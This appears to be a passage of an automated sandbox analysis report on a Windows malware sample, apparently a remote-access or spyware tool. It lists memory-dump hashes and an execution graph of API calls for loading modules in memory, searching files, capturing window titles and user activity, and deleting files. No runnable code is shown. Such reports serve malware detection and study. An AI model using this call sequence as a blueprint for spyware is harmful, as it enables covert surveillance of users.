                                                                • Instruction Fuzzy Hash: 77D1D274B042558BCB889F78C8B06BE7BB7EF88714B14C969D546DB389DE3488028796
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-3723351465
                                                                • Opcode ID: 9ec7b7d592f3dfe9043b79445a8b5cc308d3d51761bf8d400a9688093150e26e
                                                                • Instruction ID: f2ddb8500575a99770bd72d3f3296a2679b3a704840e15260f22f5e022d82a30
                                                                • Opcode Fuzzy Hash: 9ec7b7d592f3dfe9043b79445a8b5cc308d3d51761bf8d400a9688093150e26e
                                                                • Instruction Fuzzy Hash: 40413772F003058FEB68CE6988506AAB7EAEFC4650F25853BC845CB341EB31C845C791
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                • API String ID: 0-2353078639
                                                                • Opcode ID: c23c4f45d5bdf60becfb7978e4b7772023f6bfc59c41dd2edd54cd68838cfbfa
                                                                • Instruction ID: 78a6abe40f0ad1666fccbec5566a9bde37d41e70378928faa9b949d629ff9b91
                                                                • Opcode Fuzzy Hash: c23c4f45d5bdf60becfb7978e4b7772023f6bfc59c41dd2edd54cd68838cfbfa
                                                                • Instruction Fuzzy Hash: 7141F3B1F00309CFDBA88F6DD59066AB7EABF84610F18847AC809CB216DB31CA45C791
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                • API String ID: 0-2353078639
                                                                • Opcode ID: 8bfa75ee579d01132a143f54ba35f5d1b421e19a58deb54683c61b1f031713d9
                                                                • Instruction ID: 190535f7637e9c2853ad1d57e7b33ba43627b2e52210e6ab37d3665c8fead30d
                                                                • Opcode Fuzzy Hash: 8bfa75ee579d01132a143f54ba35f5d1b421e19a58deb54683c61b1f031713d9
                                                                • Instruction Fuzzy Hash: F931C6B2F00309CFDB64CE6D945466ABBEAEF85610F25846AD8568B201DB31C855C7A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q
                                                                • API String ID: 0-858218434
                                                                • Opcode ID: 40ed905d9293e5baba6bbd94ca3d279512c6088d4f6ef63b31a315ca0c4a2a70
                                                                • Instruction ID: 2262a0a0bbaeff95eb17c25eb2b4d374d44f624a8d61408eee7afd0cc1195286
                                                                • Opcode Fuzzy Hash: 40ed905d9293e5baba6bbd94ca3d279512c6088d4f6ef63b31a315ca0c4a2a70
                                                                • Instruction Fuzzy Hash: 3E21D1B6E003059FEBB4CE1889807AAB7F5AF84690F26426AC8558B341E7318480CB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                • API String ID: 0-978391646
                                                                • Opcode ID: f143632c1a92ab5cc50cb18163d660ab312259022866aa5c3361d385e57ae233
                                                                • Instruction ID: 07da5e21699368337af479e158754938a4696fe5a92e344311803ee81355d95f
                                                                • Opcode Fuzzy Hash: f143632c1a92ab5cc50cb18163d660ab312259022866aa5c3361d385e57ae233
                                                                • Instruction Fuzzy Hash: A2F0F471B4C3840FC76A062928706392FF66F82958B6A95EBC4C1DF297CE654C45C397

Execution Graph

Execution Coverage: 5.2%
Dynamic/Decrypted Code Coverage: 3.7%
Signature Coverage: 5.4%
Total number of Nodes: 1897
Total number of Limit Nodes: 77
53674->53673 53676 401ff1 53675->53676 53677 402039 53675->53677 53678 4023ce 11 API calls 53676->53678 53677->53560 53679 401ffa 53678->53679 53680 40203c 53679->53680 53682 402015 53679->53682 53681 40267a 11 API calls 53680->53681 53681->53677 53711 403098 28 API calls 53682->53711 53685 4020df 11 API calls 53684->53685 53690 404cde 53685->53690 53686 404e13 53687 401fd8 11 API calls 53686->53687 53688 404e1c 53687->53688 53688->53560 53689 401fd8 11 API calls 53689->53690 53690->53686 53690->53689 53691 4020f6 28 API calls 53690->53691 53694 4041a2 28 API calls 53690->53694 53695 401fe2 28 API calls 53690->53695 53712 4129da 53690->53712 53756 401fc0 53690->53756 53691->53690 53694->53690 53695->53690 53698 404e40 SetEvent CloseHandle 53697->53698 53699 404e57 closesocket 53697->53699 53700 404ca8 53698->53700 53701 404e64 53699->53701 53700->53568 53702 404e7a 53701->53702 54310 4050e4 84 API calls 53701->54310 53704 404e8c WaitForSingleObject 53702->53704 53705 404ece SetEvent CloseHandle 53702->53705 54311 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53704->54311 53705->53700 53707 404e9b SetEvent WaitForSingleObject 54312 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53707->54312 53709 404eb3 SetEvent CloseHandle CloseHandle 53709->53705 53710->53674 53711->53677 53713 4129ec 53712->53713 53760 4041a2 53713->53760 53716 4020f6 28 API calls 53717 412a0e 53716->53717 53718 4020f6 28 API calls 53717->53718 53719 412a1d 53718->53719 53763 41beac 53719->53763 53722 412ace 53723 401e8d 11 API calls 53722->53723 53725 412ad7 53723->53725 53724 401e65 22 API calls 53726 412a3d 53724->53726 53727 401fd8 11 API calls 53725->53727 53728 4020f6 28 API calls 53726->53728 53730 412ae0 53727->53730 53729 412a48 53728->53729 53731 401e65 22 API calls 53729->53731 53732 401fd8 11 API calls 53730->53732 53733 412a53 53731->53733 53734 412ae8 53732->53734 53735 4020f6 28 API calls 53733->53735 53734->53690 53736 412a5e 
53735->53736 53737 401e65 22 API calls 53736->53737 53738 412a69 53737->53738 53739 4020f6 28 API calls 53738->53739 53740 412a74 53739->53740 53741 401e65 22 API calls 53740->53741 53742 412a7f 53741->53742 53743 4020f6 28 API calls 53742->53743 53744 412a8a 53743->53744 53745 401e65 22 API calls 53744->53745 53746 412a95 53745->53746 53747 4020f6 28 API calls 53746->53747 53748 412aa0 53747->53748 53749 401e65 22 API calls 53748->53749 53750 412aae 53749->53750 53751 4020f6 28 API calls 53750->53751 53752 412ab9 53751->53752 53785 412aef GetModuleFileNameW 53752->53785 53755 404e26 99 API calls 53755->53722 53757 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53756->53757 53758 401fc9 53756->53758 53757->53690 54169 415b25 53757->54169 54168 4025e0 28 API calls 53758->54168 53932 40423a 53760->53932 53764 4020df 11 API calls 53763->53764 53773 41bebf 53764->53773 53765 401fd8 11 API calls 53766 41bf61 53765->53766 53768 401fd8 11 API calls 53766->53768 53767 41bf31 53769 4041a2 28 API calls 53767->53769 53771 41bf69 53768->53771 53772 41bf3d 53769->53772 53770 4041a2 28 API calls 53770->53773 53774 401fd8 11 API calls 53771->53774 53775 401fe2 28 API calls 53772->53775 53773->53767 53773->53770 53776 401fe2 28 API calls 53773->53776 53780 401fd8 11 API calls 53773->53780 53784 41bf2f 53773->53784 53938 41cec5 53773->53938 53777 412a26 53774->53777 53778 41bf46 53775->53778 53776->53773 53777->53722 53777->53724 53779 401fd8 11 API calls 53778->53779 53781 41bf4e 53779->53781 53780->53773 53782 41cec5 28 API calls 53781->53782 53782->53784 53784->53765 53786 4020df 11 API calls 53785->53786 53787 412b1a 53786->53787 53788 4020df 11 API calls 53787->53788 53789 412b26 53788->53789 53790 4020df 11 API calls 53789->53790 53812 412b32 53790->53812 53791 41ba09 43 API calls 53791->53812 53792 40da23 32 API calls 53792->53812 53793 401fd8 11 API calls 53793->53812 53794 40417e 28 API calls 53794->53812 53795 4042fc 79 API calls 53795->53812 53796 
40431d 28 API calls 53796->53812 53797 412c58 Sleep 53797->53812 53798 403014 28 API calls 53798->53812 53799 4185a3 31 API calls 53799->53812 53800 412cfa Sleep 53800->53812 53801 401f09 11 API calls 53801->53812 53802 412d9c Sleep 53802->53812 53803 412dff DeleteFileW 53803->53812 53804 41c516 32 API calls 53804->53812 53805 412e36 DeleteFileW 53805->53812 53806 412e88 Sleep 53806->53812 53807 412e72 DeleteFileW 53807->53812 53808 412f01 53809 401f09 11 API calls 53808->53809 53810 412f0d 53809->53810 53811 401f09 11 API calls 53810->53811 53813 412f19 53811->53813 53812->53791 53812->53792 53812->53793 53812->53794 53812->53795 53812->53796 53812->53797 53812->53798 53812->53799 53812->53800 53812->53801 53812->53802 53812->53803 53812->53804 53812->53805 53812->53806 53812->53807 53812->53808 53815 412ecd Sleep 53812->53815 53814 401f09 11 API calls 53813->53814 53816 412f25 53814->53816 53981 401f09 53815->53981 53963 40b93f 53816->53963 53819 412f38 53820 4020f6 28 API calls 53819->53820 53822 412f58 53820->53822 53821 401f09 11 API calls 53823 412edd 53821->53823 53969 413268 53822->53969 53823->53812 53823->53821 53825 412eff 53823->53825 53825->53816 53827 401f09 11 API calls 53828 412f6f 53827->53828 53829 4130e3 53828->53829 53830 412f8f 53828->53830 53831 41bdaf 28 API calls 53829->53831 53984 41bdaf 53830->53984 53833 4130ec 53831->53833 53835 402f31 28 API calls 53833->53835 53837 413123 53835->53837 53840 402f10 28 API calls 53837->53840 53839 402f31 28 API calls 53842 412fe5 53839->53842 53841 413132 53840->53841 53843 402f10 28 API calls 53841->53843 53844 402f10 28 API calls 53842->53844 53845 41313e 53843->53845 53846 412ff4 53844->53846 53847 402f10 28 API calls 53845->53847 53848 402f10 28 API calls 53846->53848 53849 41314d 53847->53849 53850 413003 53848->53850 53851 402f10 28 API calls 53849->53851 53852 402f10 28 API calls 53850->53852 53853 41315c 53851->53853 53854 413012 53852->53854 53855 402f10 28 API calls 53853->53855 53856 402f10 28 
API calls 53854->53856 53857 41316b 53855->53857 53858 413021 53856->53858 53859 402f10 28 API calls 53857->53859 53860 402f10 28 API calls 53858->53860 53861 41317a 53859->53861 53862 41302d 53860->53862 53863 402ea1 28 API calls 53861->53863 53864 402f10 28 API calls 53862->53864 53865 413184 53863->53865 53866 413039 53864->53866 53867 404aa1 61 API calls 53865->53867 53993 402ea1 53866->53993 53869 413191 53867->53869 53872 401fd8 11 API calls 53869->53872 53871 402f10 28 API calls 53874 413054 53871->53874 53873 41319d 53872->53873 53875 401fd8 11 API calls 53873->53875 53876 402ea1 28 API calls 53874->53876 53877 4131a9 53875->53877 53878 41305e 53876->53878 53879 401fd8 11 API calls 53877->53879 53880 404aa1 61 API calls 53878->53880 53881 4131b5 53879->53881 53882 41306b 53880->53882 53883 401fd8 11 API calls 53881->53883 53884 401fd8 11 API calls 53882->53884 53885 4131c1 53883->53885 53886 413074 53884->53886 53887 401fd8 11 API calls 53885->53887 53888 401fd8 11 API calls 53886->53888 53889 4131ca 53887->53889 53890 41307d 53888->53890 53891 401fd8 11 API calls 53889->53891 53892 401fd8 11 API calls 53890->53892 53893 4131d3 53891->53893 53894 413086 53892->53894 53895 401fd8 11 API calls 53893->53895 53896 401fd8 11 API calls 53894->53896 53897 4130d7 53895->53897 53898 41308f 53896->53898 53900 401fd8 11 API calls 53897->53900 53899 401fd8 11 API calls 53898->53899 53901 41309b 53899->53901 53903 4131e5 53900->53903 53902 401fd8 11 API calls 53901->53902 53905 4130a7 53902->53905 53904 401f09 11 API calls 53903->53904 53906 4131f1 53904->53906 53907 401fd8 11 API calls 53905->53907 53908 401fd8 11 API calls 53906->53908 53909 4130b3 53907->53909 53910 4131fd 53908->53910 53911 401fd8 11 API calls 53909->53911 53912 401fd8 11 API calls 53910->53912 53913 4130bf 53911->53913 53914 413209 53912->53914 53915 401fd8 11 API calls 53913->53915 53916 401fd8 11 API calls 53914->53916 53917 4130cb 53915->53917 53918 413215 53916->53918 53919 401fd8 11 API calls 
53917->53919 53920 401fd8 11 API calls 53918->53920 53919->53897 53921 413221 53920->53921 53922 401fd8 11 API calls 53921->53922 53923 41322d 53922->53923 53924 401fd8 11 API calls 53923->53924 53925 413239 53924->53925 53926 401fd8 11 API calls 53925->53926 53927 413245 53926->53927 53928 401fd8 11 API calls 53927->53928 53929 413251 53928->53929 53930 401fd8 11 API calls 53929->53930 53931 412abe 53930->53931 53931->53755 53933 404243 53932->53933 53934 4023ce 11 API calls 53933->53934 53935 40424e 53934->53935 53936 402569 28 API calls 53935->53936 53937 4041b5 53936->53937 53937->53716 53939 41ced2 53938->53939 53940 41cf31 53939->53940 53944 41cee2 53939->53944 53941 41cf4b 53940->53941 53954 41d071 28 API calls 53940->53954 53943 41d1d7 28 API calls 53941->53943 53948 41cf2d 53943->53948 53946 41cf1a 53944->53946 53949 41d071 28 API calls 53944->53949 53950 41d1d7 53946->53950 53948->53773 53949->53946 53951 41d1e0 53950->53951 53955 41d283 53951->53955 53954->53941 53956 41d28c 53955->53956 53959 41d331 53956->53959 53961 41d33c 53959->53961 53960 41d1ea 53960->53948 53961->53960 53962 4020f6 28 API calls 53961->53962 53962->53960 53964 40b947 53963->53964 54002 402252 53964->54002 53966 40b952 54006 40b967 53966->54006 53968 40b961 53968->53819 53971 413277 53969->53971 53979 4132a6 53969->53979 53970 4132b5 54036 40417e 53970->54036 54032 411d2d 53971->54032 53976 401fd8 11 API calls 53978 412f63 53976->53978 53978->53827 53979->53970 54028 10001c5b 53979->54028 53982 402252 11 API calls 53981->53982 53983 401f12 53982->53983 53983->53823 53985 41bdbc 53984->53985 53986 4020b7 28 API calls 53985->53986 53987 412f9b 53986->53987 53988 41bc1f 53987->53988 54158 441ed1 53988->54158 53991 402093 28 API calls 53992 412fb5 53991->53992 53992->53839 53996 402eb0 53993->53996 53994 402ef2 53995 401fb0 28 API calls 53994->53995 54001 402ef0 53995->54001 53996->53994 53999 402ee7 53996->53999 53997 402055 11 API calls 53998 402f09 53997->53998 53998->53871 54167 
403365 28 API calls 53999->54167 54001->53997 54003 40225c 54002->54003 54004 4022ac 54002->54004 54003->54004 54013 402779 11 API calls std::_Deallocate 54003->54013 54004->53966 54007 40b9a1 54006->54007 54008 40b973 54006->54008 54025 4028a4 22 API calls 54007->54025 54014 4027e6 54008->54014 54012 40b97d 54012->53968 54013->54004 54015 4027ef 54014->54015 54016 402851 54015->54016 54017 4027f9 54015->54017 54027 4028a4 22 API calls 54016->54027 54020 402802 54017->54020 54022 402815 54017->54022 54026 402aea 28 API calls __EH_prolog 54020->54026 54023 402813 54022->54023 54024 402252 11 API calls 54022->54024 54023->54012 54024->54023 54026->54023 54029 10001c6b ___scrt_fastfail 54028->54029 54042 100012ee 54029->54042 54031 10001c87 54031->53970 54084 411d39 54032->54084 54035 411fa2 22 API calls _Yarn 54035->53979 54037 404186 54036->54037 54038 402252 11 API calls 54037->54038 54039 404191 54038->54039 54137 4041bc 54039->54137 54043 10001324 ___scrt_fastfail 54042->54043 54044 100013b7 GetEnvironmentVariableW 54043->54044 54068 100010f1 54044->54068 54047 100010f1 57 API calls 54048 10001465 54047->54048 54049 100010f1 57 API calls 54048->54049 54050 10001479 54049->54050 54051 100010f1 57 API calls 54050->54051 54052 1000148d 54051->54052 54053 100010f1 57 API calls 54052->54053 54054 100014a1 54053->54054 54055 100010f1 57 API calls 54054->54055 54056 100014b5 lstrlenW 54055->54056 54057 100014d2 54056->54057 54058 100014d9 lstrlenW 54056->54058 54057->54031 54059 100010f1 57 API calls 54058->54059 54060 10001501 lstrlenW lstrcatW 54059->54060 54061 100010f1 57 API calls 54060->54061 54062 10001539 lstrlenW lstrcatW 54061->54062 54063 100010f1 57 API calls 54062->54063 54064 1000156b lstrlenW lstrcatW 54063->54064 54065 100010f1 57 API calls 54064->54065 54066 1000159d lstrlenW lstrcatW 54065->54066 54067 100010f1 57 API calls 54066->54067 54067->54057 54069 10001118 ___scrt_fastfail 54068->54069 54070 10001129 lstrlenW 54069->54070 54081 10002c40 
54070->54081 54073 10001177 lstrlenW FindFirstFileW 54075 100011a0 54073->54075 54076 100011e1 54073->54076 54074 10001168 lstrlenW 54074->54073 54077 100011c7 FindNextFileW 54075->54077 54078 100011aa 54075->54078 54076->54047 54077->54075 54080 100011da FindClose 54077->54080 54078->54077 54083 10001000 57 API calls ___scrt_fastfail 54078->54083 54080->54076 54082 10001148 lstrcatW lstrlenW 54081->54082 54082->54073 54082->54074 54083->54078 54117 4117d7 54084->54117 54086 411d57 54087 411d6d SetLastError 54086->54087 54088 4117d7 SetLastError 54086->54088 54114 411d35 54086->54114 54087->54114 54089 411d8a 54088->54089 54089->54087 54091 411dac GetNativeSystemInfo 54089->54091 54089->54114 54092 411df2 54091->54092 54103 411dff SetLastError 54092->54103 54120 411cde VirtualAlloc 54092->54120 54095 411e22 54096 411e47 GetProcessHeap HeapAlloc 54095->54096 54130 411cde VirtualAlloc 54095->54130 54097 411e70 54096->54097 54098 411e5e 54096->54098 54102 4117d7 SetLastError 54097->54102 54131 411cf5 VirtualFree 54098->54131 54100 411e3a 54100->54096 54100->54103 54104 411eb9 54102->54104 54103->54114 54105 411f6b 54104->54105 54121 411cde VirtualAlloc 54104->54121 54132 4120b2 GetProcessHeap HeapFree 54105->54132 54108 411ed2 ctype 54122 4117ea SetLastError ctype ___scrt_get_show_window_mode 54108->54122 54110 411efe 54110->54105 54123 411b9a 26 API calls 54110->54123 54112 411f2b 54112->54105 54124 41198a 54112->54124 54114->54035 54115 411f36 54115->54105 54115->54114 54116 411f60 SetLastError 54115->54116 54116->54105 54118 4117e6 54117->54118 54119 4117db SetLastError 54117->54119 54118->54086 54119->54086 54120->54095 54121->54108 54122->54110 54123->54112 54126 4119b0 54124->54126 54125 4118ed VirtualProtect 54129 411aab 54125->54129 54128 411a99 54126->54128 54126->54129 54133 4118ed 54126->54133 54128->54125 54129->54115 54130->54100 54131->54103 54132->54114 54134 4118fe 54133->54134 54135 4118f6 54133->54135 54134->54135 54136 411971 VirtualProtect 
54134->54136 54135->54126 54136->54135 54138 4041c8 54137->54138 54141 4041d9 54138->54141 54140 40419c 54140->53976 54142 4041e9 54141->54142 54143 404206 54142->54143 54144 4041ef 54142->54144 54145 4027e6 28 API calls 54143->54145 54148 404267 54144->54148 54147 404204 54145->54147 54147->54140 54149 402888 22 API calls 54148->54149 54150 40427b 54149->54150 54151 404290 54150->54151 54152 4042a5 54150->54152 54154 4042df 22 API calls 54151->54154 54153 4027e6 28 API calls 54152->54153 54157 4042a3 54153->54157 54155 404299 54154->54155 54156 402c48 22 API calls 54155->54156 54156->54157 54157->54147 54159 441edd 54158->54159 54162 441ccd 54159->54162 54161 41bc43 54161->53991 54163 441ce4 54162->54163 54165 441d1b _abort 54163->54165 54166 44062d 20 API calls _abort 54163->54166 54165->54161 54166->54165 54167->54001 54168->53757 54170 4020f6 28 API calls 54169->54170 54171 415b47 SetEvent 54170->54171 54172 415b5c 54171->54172 54173 4041a2 28 API calls 54172->54173 54174 415b76 54173->54174 54175 4020f6 28 API calls 54174->54175 54176 415b86 54175->54176 54177 4020f6 28 API calls 54176->54177 54178 415b98 54177->54178 54179 41beac 28 API calls 54178->54179 54180 415ba1 54179->54180 54181 415bc1 GetTickCount 54180->54181 54182 415d20 54180->54182 54246 415d11 54180->54246 54184 41bc1f 28 API calls 54181->54184 54182->54246 54247 415d34 54182->54247 54183 401e8d 11 API calls 54185 4170cd 54183->54185 54186 415bd2 54184->54186 54188 401fd8 11 API calls 54185->54188 54248 41bb77 GetLastInputInfo GetTickCount 54186->54248 54190 4170d9 54188->54190 54192 401fd8 11 API calls 54190->54192 54191 415bde 54194 41bc1f 28 API calls 54191->54194 54193 4170e5 54192->54193 54195 415be9 54194->54195 54249 41bb27 54195->54249 54198 41bdaf 28 API calls 54199 415c05 54198->54199 54200 401e65 22 API calls 54199->54200 54201 415c13 54200->54201 54202 402f31 28 API calls 54201->54202 54203 415c21 54202->54203 54204 402ea1 28 API calls 54203->54204 54205 415c30 54204->54205 54206 
402f10 28 API calls 54205->54206 54207 415c3f 54206->54207 54208 402ea1 28 API calls 54207->54208 54209 415c4e 54208->54209 54210 402f10 28 API calls 54209->54210 54211 415c5a 54210->54211 54212 402ea1 28 API calls 54211->54212 54213 415c64 54212->54213 54214 404aa1 61 API calls 54213->54214 54215 415c73 54214->54215 54216 401fd8 11 API calls 54215->54216 54217 415c7c 54216->54217 54218 401fd8 11 API calls 54217->54218 54219 415c88 54218->54219 54220 401fd8 11 API calls 54219->54220 54221 415c94 54220->54221 54222 401fd8 11 API calls 54221->54222 54223 415ca0 54222->54223 54224 401fd8 11 API calls 54223->54224 54225 415cac 54224->54225 54226 401fd8 11 API calls 54225->54226 54227 415cb8 54226->54227 54228 401f09 11 API calls 54227->54228 54229 415cc1 54228->54229 54230 401fd8 11 API calls 54229->54230 54231 415cca 54230->54231 54232 401fd8 11 API calls 54231->54232 54233 415cd3 54232->54233 54234 401e65 22 API calls 54233->54234 54235 415cde 54234->54235 54254 43bb2c 54235->54254 54238 415cf0 54241 415d09 54238->54241 54242 415cfe 54238->54242 54239 415d16 54240 401e65 22 API calls 54239->54240 54240->54182 54259 404f51 54241->54259 54258 404ff4 82 API calls 54242->54258 54245 415d04 54245->54246 54246->54183 54274 4050e4 84 API calls 54247->54274 54248->54191 54275 436f10 54249->54275 54252 40417e 28 API calls 54253 415bf7 54252->54253 54253->54198 54255 43bb45 _strftime 54254->54255 54277 43ae83 54255->54277 54257 415ceb 54257->54238 54257->54239 54258->54245 54260 404f65 54259->54260 54261 404fea 54259->54261 54262 404f6e 54260->54262 54263 404fc0 CreateEventA CreateThread 54260->54263 54264 404f7d GetLocalTime 54260->54264 54261->54246 54262->54263 54263->54261 54306 405150 54263->54306 54265 41bc1f 28 API calls 54264->54265 54266 404f91 54265->54266 54305 4052fd 28 API calls 54266->54305 54274->54245 54276 41bb46 GetForegroundWindow GetWindowTextW 54275->54276 54276->54252 54293 43ba8a 54277->54293 54279 43aed0 54299 43a837 36 API calls 3 library calls 
54279->54299 54281 43ae95 54281->54279 54282 43aeaa 54281->54282 54292 43aeaf _abort 54281->54292 54298 44062d 20 API calls _abort 54282->54298 54285 43aedc 54286 43af0b 54285->54286 54300 43bacf 40 API calls __Tolower 54285->54300 54288 43af77 54286->54288 54301 43ba36 20 API calls 2 library calls 54286->54301 54302 43ba36 20 API calls 2 library calls 54288->54302 54290 43b03e _strftime 54290->54292 54303 44062d 20 API calls _abort 54290->54303 54292->54257 54294 43baa2 54293->54294 54295 43ba8f 54293->54295 54294->54281 54304 44062d 20 API calls _abort 54295->54304 54297 43ba94 _abort 54297->54281 54298->54292 54299->54285 54300->54285 54301->54288 54302->54290 54303->54292 54304->54297 54309 40515c 102 API calls 54306->54309 54308 405159 54309->54308 54310->53702 54311->53707 54312->53709 54313 43bea8 54316 43beb4 _swprintf ___DestructExceptionObject 54313->54316 54314 43bec2 54329 44062d 20 API calls _abort 54314->54329 54316->54314 54317 43beec 54316->54317 54324 445909 EnterCriticalSection 54317->54324 54319 43bef7 54325 43bf98 54319->54325 54320 43bec7 ___DestructExceptionObject _abort 54324->54319 54326 43bfa6 54325->54326 54328 43bf02 54326->54328 54331 4497ec 37 API calls 2 library calls 54326->54331 54330 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 54328->54330 54329->54320 54330->54320 54331->54326 54332 434918 54333 434924 ___DestructExceptionObject 54332->54333 54359 434627 54333->54359 54335 43492b 54337 434954 54335->54337 54657 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54335->54657 54345 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54337->54345 54658 4442d2 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 54337->54658 54339 43496d 54341 434973 ___DestructExceptionObject 54339->54341 54659 444276 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 54339->54659 54342 4349f3 54370 
434ba5 54342->54370 54345->54342 54660 443487 36 API calls 3 library calls 54345->54660 54352 434a15 54353 434a1f 54352->54353 54662 4434bf 28 API calls _abort 54352->54662 54355 434a28 54353->54355 54663 443462 28 API calls _abort 54353->54663 54664 43479e 13 API calls 2 library calls 54355->54664 54358 434a30 54358->54341 54360 434630 54359->54360 54665 434cb6 IsProcessorFeaturePresent 54360->54665 54362 43463c 54666 438fb1 10 API calls 4 library calls 54362->54666 54364 434641 54369 434645 54364->54369 54667 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54364->54667 54366 43464e 54367 43465c 54366->54367 54668 438fda 8 API calls 3 library calls 54366->54668 54367->54335 54369->54335 54371 436f10 ___scrt_get_show_window_mode 54370->54371 54372 434bb8 GetStartupInfoW 54371->54372 54373 4349f9 54372->54373 54374 444223 54373->54374 54669 44f0d9 54374->54669 54376 44422c 54378 434a02 54376->54378 54673 446895 36 API calls 54376->54673 54379 40ea00 54378->54379 54675 41cbe1 LoadLibraryA GetProcAddress 54379->54675 54381 40ea1c GetModuleFileNameW 54680 40f3fe 54381->54680 54383 40ea38 54384 4020f6 28 API calls 54383->54384 54385 40ea47 54384->54385 54386 4020f6 28 API calls 54385->54386 54387 40ea56 54386->54387 54388 41beac 28 API calls 54387->54388 54389 40ea5f 54388->54389 54695 40fb52 54389->54695 54391 40ea68 54392 401e8d 11 API calls 54391->54392 54393 40ea71 54392->54393 54394 40ea84 54393->54394 54395 40eace 54393->54395 54889 40fbee 118 API calls 54394->54889 54396 401e65 22 API calls 54395->54396 54398 40eade 54396->54398 54402 401e65 22 API calls 54398->54402 54399 40ea96 54400 401e65 22 API calls 54399->54400 54401 40eaa2 54400->54401 54890 410f72 36 API calls __EH_prolog 54401->54890 54403 40eafd 54402->54403 54404 40531e 28 API calls 54403->54404 54407 40eb0c 54404->54407 54406 40eab4 54891 40fb9f 78 API calls 54406->54891 54409 406383 28 API calls 54407->54409 54411 40eb18 
54409->54411 54410 40eabd 54892 40f3eb 71 API calls 54410->54892 54412 401fe2 28 API calls 54411->54412 54414 40eb24 54412->54414 54415 401fd8 11 API calls 54414->54415 54416 40eb2d 54415->54416 54418 401fd8 11 API calls 54416->54418 54417 401fd8 11 API calls 54419 40ef36 54417->54419 54420 40eb36 54418->54420 54661 443396 GetModuleHandleW 54419->54661 54421 401e65 22 API calls 54420->54421 54422 40eb3f 54421->54422 54423 401fc0 28 API calls 54422->54423 54424 40eb4a 54423->54424 54425 401e65 22 API calls 54424->54425 54426 40eb63 54425->54426 54427 401e65 22 API calls 54426->54427 54428 40eb7e 54427->54428 54429 40ebe9 54428->54429 54893 406c59 54428->54893 54430 401e65 22 API calls 54429->54430 54435 40ebf6 54430->54435 54432 40ebab 54433 401fe2 28 API calls 54432->54433 54434 40ebb7 54433->54434 54437 401fd8 11 API calls 54434->54437 54436 40ec3d 54435->54436 54442 413584 3 API calls 54435->54442 54699 40d0a4 54436->54699 54438 40ebc0 54437->54438 54898 413584 RegOpenKeyExA 54438->54898 54440 40ec43 54441 40eac6 54440->54441 54702 41b354 54440->54702 54441->54417 54448 40ec21 54442->54448 54446 40ec5e 54449 40ecb1 54446->54449 54719 407751 54446->54719 54447 40f38a 54991 4139e4 30 API calls 54447->54991 54448->54436 54901 4139e4 30 API calls 54448->54901 54452 401e65 22 API calls 54449->54452 54455 40ecba 54452->54455 54454 40f3a0 54992 4124b0 65 API calls ___scrt_get_show_window_mode 54454->54992 54463 40ecc6 54455->54463 54464 40eccb 54455->54464 54458 40ec87 54461 401e65 22 API calls 54458->54461 54459 40ec7d 54902 407773 30 API calls 54459->54902 54473 40ec90 54461->54473 54462 40f3aa 54466 41bcef 28 API calls 54462->54466 54905 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 54463->54905 54469 401e65 22 API calls 54464->54469 54465 40ec82 54903 40729b 98 API calls 54465->54903 54470 40f3ba 54466->54470 54471 40ecd4 54469->54471 54791 413a5e RegOpenKeyExW 54470->54791 54723 41bcef 54471->54723 54473->54449 54477 40ecac 54473->54477 
